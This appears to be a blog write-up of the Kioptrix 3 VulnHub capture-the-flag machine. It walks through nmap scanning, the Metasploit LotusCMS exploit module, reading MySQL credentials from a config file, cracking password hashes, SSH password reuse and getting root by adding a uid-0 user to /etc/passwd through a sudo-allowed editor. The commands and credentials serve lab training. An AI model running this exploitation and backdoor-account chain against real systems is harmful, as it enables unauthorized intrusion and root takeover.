Home Hacking CTF CTF: Kioptrix 3

CTF: Kioptrix 3

434

CTF: Kioptrix 3

This is another OSCP like VulnHub that was very fun to do. I didn’t have any issues rooting this one and was able to do it rather quickly.

You will get practice with:

  • nmap
  • metasploit
  • mysql client
  • file privilege escalation

Enumeration

I start off with an arp-scan to find the local machine… and it turns out that my box is 192.168.0.46. Let’s get this party started!

sudo arp-scan -l
(arp-scan)

nmap

A basic nmap scan returns a website and an ssh port. After the initial nmap scan I kick off a more thorough scan. It doesn’t tell me anything I didn’t learn some the initial scan.

# basic scan
nmap 192.168.0.46

# deeper scan
sudo nmap -p- -AO 192.168.0.46

Website

The website looks like a simple CMS. On the login page, I can see that this is a LotusCMS. I immediately search online and see there is a Metasploit vulnerability.

(website hosted on port 80)
(LotusCMS)

Exploit with Metasploit

I start up Metasploit and use the search functionality to find a module.

# start metasploit
msfconsole

# once started search for "lotuscms"
search lotuscms
# use module
use exploit/multi/http/lcms_php_exec

# show options
show options

# set options
set RHOSTS 192.168.0.46
set URI /

# exploit
run
(exploit/multi/http/lcms_php_exec)
(exploit)
(and we have access)

Pseudo Terminal

I personally prefer shell over merterpreter. It’s just more natural. I also like having the ability to clear the screen so I always set the terminal variable.

shell

python -c "import pty; pty.spawn('/bin/bash')"

export TERM=xterm
(setting terminal variable)

I immediately check the home directory to see who’s there. Then I check the /etc/passwd and take notes.

ls -la /home/

ls -la /home/dreg /home/loneferret /home/www
(checking home directory)

ALRIGHT! There’s a pretty big clue. “.sudo_as_admin_successful” means that loneferret can run something as root. That looks like the way up!

Internal Enumeration

I looked around and I didn’t see much of anything that I could exploit. I didn’t see any misconfigured file permissions that I had access to… but I did see that mysql was running and was bound locally.

I ran checksec.sh just to see what it did.

(checksec.sh)

MySQL is Running

I found MySQL running locally and the MySQL client was able to connect to it. Looks like I need to find some credentials to access the database.

netstat -ntl

I tried logging in as root to see if a password had not been set… but I wasn’t that lucky.

Exploring the LotusCMS Website

It’s fair to assume that if there is a Content Management System (CMS) running then there should be credentials to access some sort of database. MySQL is the most common database used with PHP applications. After digging around I found a gallery folder that contained a file “gconfig.php” This file was referenced in the index.php file and looked like a global configuration file.

cat gconfig.php
(gconfig.php)

OK! I now have root credentials for the MySQL server.

Time to move through the database and see what I can find.

# connect to mysql in bash
mysql -u root -h 127.0.0.1 -p
fuckeyou

# once in mysql >
show database;
use gallery;
show tables;
describe dev_accounts;
select *from dev_accounts;

(credentials found in the database)

Cracking Passwords

I took those two md5 hashes and dropped them in CrackStation to get the passwords.

Turns out their passwords are:
dreg – Mas3r
loneferret – starwars

Privilege Escalation

It’s very common for people to re-use their same passwords for logins elsewhere. While this appears to be passwords to the gallery page, it could also be a Linux user’s password. Turns out, loneferret’s password works for shell access.

ssh [email protected]
starwars

I’m now in under the user, loneferret and I know this user has sudo access to an application.

sudo -l
(Checking sudo access)

So, I can run “ht” which is a terminal editor under root.

After messing around I was able to get a screen I could work on and I decided to use the same trick I used on HA: Albania and inject a user into the /etc/passwd file.

# append this to the /etc/passwd file in the ht editor
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash

Root

Well, this just got easy… I really enjoyed this one.

su hax
asdf
cd /root
ls -la
cat flag.txt

Thanks, Steven!

NO COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here